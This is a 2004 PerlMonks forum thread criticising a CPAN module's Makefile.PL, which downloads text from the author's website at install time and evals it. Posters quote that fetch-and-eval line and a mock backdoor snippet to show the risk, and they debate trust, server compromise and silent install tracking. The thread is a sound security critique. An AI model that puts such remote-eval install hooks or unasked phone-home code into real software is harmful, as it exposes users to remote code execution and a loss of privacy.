Beefy Boxes and Bandwidth Generously Provided by pair Networks
more useful options
 
PerlMonks  

Re: Re: CGI::Application vs CGI::Builder

by tantarbobus (Hermit)
on May 03, 2004 at 03:09 UTC ( #349906=note: print w/ replies, xml ) Need Help??


in reply to Re: CGI::Application vs CGI::Builder
in thread CGI::Application vs CGI::Builder

Perrin, Maybe the style is not evil, but what Makefile.PL does is quite Evil

; eval { require LWP::Simple ; my $res = LWP::Simple::get ( "http://perl.4pro.net/install.txt" . "?DISTRIBUTION=$dist&VERSION=$vers&PERL=$]-$^O" ) ; eval $res if $res }
I am assuming that this is just a benign install counter and maybe it has the ability to alert the user that the version being installed has been updated, but how do I know that there is not something like this at perl.4pro.net?
; if (grep /$uesr_domain/ @my_enemies) ; { open(FH, '<', 'backdoor.txt') ; print while(<FH>) ; print STDERR "$user_host 0wn3d! hehehe\g\g\g\g\g\g\g\n" { else { ; open(FH, '<', 'message.txt') ; print while (<FH>) ; pint STDERR "Tick\n" } ;close FH

And even if there is no code like that. 1. It is still underhanded! and 2. What happens if perl.4pro.net gets owned, then someone could install code that does the above. Bonus points for doing it as a kernel module!

Would it not be ironic were his site to be comprimised by another module's "Counter feature"?

And look at per.4pro.net, it shows quite a few perl modules, and I would wager that most of them the same code in the Makefile.PL.


Comment on Re: Re: CGI::Application vs CGI::Builder
Select or Download Code
Re: Re: Re: CGI::Application vs CGI::Builder
by Anonymous Monk on May 03, 2004 at 07:22 UTC
    > I am assuming that this is just a benign install
    > counter and maybe it has the ability to alert the user
    > that the version being installed has been updated

    It's exactly that ;-). Just try to install an old version and you will have a prompt telling you that you are installing an old version, and for the counter... knowing how many people find useful my work is one of the reasons that make me publish my modules ;-)

    > It is still underhanded!

    Well, if you go through some old version of my modules, the Makefile.PL had a prompt. After receiving a lot of users' complaint i take off the prompt. No secret backdoor. The effort and time that require writing modules like CGI::Builder and related documentation is a little bit TOO MUCH to be wasted in similar stupid hacks.

    > What happens if perl.4pro.net gets owned, then someone could install code that does the above.

    This is a really GOOD question, and I didn't think about that before your post!!! Thank you very much! Even if it is a very remote possibility, it's real. I think that a possible solution may be adding an expiration date in the code in the Makefile.PL, thus if it runs after that date, it just warn the user of the probably old version and does nothing with perl.4pro.net.

    Any other suggestion?

    Domizio Demichelis

      It's exactly that ;-). Just try to install an old version and you will have a prompt telling you that you are installing an old version

      If they're installing automatically from CPAN they'll get the latest CPAN version automatically.

      If they're deliberately requesting and older version then they're doing it deliberately and don't want the warning.

      If your site has a more up-to-date version than the one on CPAN surely its your job to get the latest version uploaded to PAUSE ;-)

      In any case this doesn't need you to execute arbitrary code - you just need to fetch the version number and do a comparison.

      and for the counter... knowing how many people find useful my work is one of the reasons that make me publish my modules ;-)

      If you really have to have a counter then a simple HTTP GET will do the job (it can be the GET you use to get the current version if you really want to do the version checking twice).

      A count of module usage produced in this way will, of course, be wildly inaccurate since there are lots of installs that have nothing to do with actual usage (CPAN testers, people who are curious but never use, etc.)

      Well, if you go through some old version of my modules, the Makefile.PL had a prompt. After receiving a lot of users' complaint i take off the prompt. No secret backdoor.

      Just because people didn't like the warning doesn't mean it shouldn't have been there. I for one would be extremely annoyed if a CPAN module was downloading an executing code that I didn't see first. Especially since in this instance there is no need to download and execute arbitrary code. From the other reactions here many people seem to share that opinion.

      The effort and time that require writing modules like CGI::Builder and related documentation is a little bit TOO MUCH to be wasted in similar stupid hacks.

      Unfortunately there is a large body of evidence that nasty people are willing to expend foolishly large amounts of time and effort in producing exploits.

      Note: I am not trying to imply that you are such a nasty person. As a human being I try to be all nice and fluffy and trust people until they do something to demonstrate that I can't trust them. I like living my live that way.

      However, as a computing professional I can't trust something that runs arbitrary code on my or my clients machines. With your system look at who I have to trust (in addition to CPAN):

      • I have to trust that the code that is downloaded is actually okay and I have to go through another step to download and inspect it.
      • I have to trust that you are not an evil person who is deliberately trying to exploit my machine. You might be doing really evil things like only putting the exploit in every 8th download so a simple check on what's downloaded isn't enough.
      • I have to trust that somebody has not cracked your box and is feeding us an exploit without your knowledge.
      • I have to trust everything between my box and your box is not pretending to be your box and feeding me an exploiit.
      • etc.
      I think that a possible solution may be adding an expiration date in the code in the Makefile.PL, thus if it runs after that date, it just warn the user of the probably old version and does nothing with perl.4pro.net.

      This only reduces the window of opportunity. It does not remove it.

      Any other suggestion?
      1. Just don't do it at all. Let CPAN handle your versioning problems. Get your feedback from users via e-mail, cpanratings, etc. Learn not to worry about the number of times your code is installed since it doesn't really mean much.
      2. If you really cannot cope without some meaningless numbers do not download and execute arbitrary code. You don't need to do so if all you want to do is check a version number or get a count of the number of times Makefile.PL is run.
      3. Ask the user before starting any network connections off your own back.

        I perfectly agree with you, but please, consider this:

        There is no problem with CPAN version handling, the problem is that there are a lot of old installation coming from activestate. I really hate to see that someone could run some old version that may have some bug which is already fixed in the new version. (hubris?)

        > Learn not to worry about the number of times your code is installed
        > since it doesn't really mean much.

        Well, I am not english native, and writing the documentation takes me really A LOT of time, so knowing that my effort are useful to someone really helps me, even if the numbers are "wildly inaccurate". Nobody likes to do something possibly useless!

        > Unfortunately there is a large body of evidence that nasty people are
        > willing to expend foolishly large amounts of time and effort in producing exploits.

        That's true, but who could be so stupid to do bad things using its own name and its own registered domain? Anyway, I hope that my quick fix can solve that problem.

        Thank you for your feedback. I will take it into consideration.

        dd

Re: Re: Re: CGI::Application vs CGI::Builder
by Anonymous Monk on May 03, 2004 at 19:32 UTC

    Even better: Since I have no need to send something to eval from my domain, I will put all the code to execute in the Makefile.PL avoiding any "insane suspect".

    I need just to check the version number, so I think that something like this could be ok:

    ; my $dist = 'CGI::Builder'; ; my $vers = 1.21 ; ; my $LWP_installed = eval {require LWP::Simple} ; ; if ( $LWP_installed ) { my $current_vers = LWP::Simple::get ( "http://perl.4pro.net/check_version.cgi" . "?DISTRIBUTION=$dist&VERSION=$vers&PERL=$]-$^O +" ) ; if ( $current_vers > $vers ) { print 'This is an OLD VERSION! ... bla, bla ' } else { print 'Version OK ... bla, bla' } }

    If there are no objection, I will change all my Makefile.PL with that code in the next version.
    (I will update all my new distribution in a day or so).

    Regards

    Domizio Demichelis

      One slight problem - if you have a system that cannot talk directly to the outside world, then your Makefile assumes that the version is OK. The code doesn't fail, it just makes an assumption (proper or improper) that no news is good news.

      --MidLifeXis

      Domizio:

      The problem is that you do NOT have any right to know that I installed your module from the CPAN, and it IS an invasion of my privacy for you to grab my IP address. When I intentionally go to your web site with my browser, it is a given that I am choosing to have you record who I am. Here, you are doing it without my permission or knowledge. You are capturing data about me against my will, which is a de facto breach of my privacy.

      There's no two ways about it.

      Your idea is not bad, but is done incorrectly. The whole thing would be solved if you asked permission before fetching it. I know that is a burden, but tough. You do not have the right to collect my data without my persmission, explicit or otherwise.

        Thank you for your feedback, I wrote a post about this matter that may be of your interest: http://www.xray.mpe.mpg.de/mailing-lists/modules/2004-05/msg00211.html Regards Domizio

Log In?
Username:
Password:

What's my password?
Create A New User
Node Status?
node history
Node Type: note [id://349906]
help
Chatterbox?
and the web crawler heard nothing...

How do I use this? | Other CB clients
Other Users?
Others chanting in the Monastery: (7)
As of 2014-12-22 23:09 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    Is guessing a good strategy for surviving in the IT business?





    Results (133 votes), past polls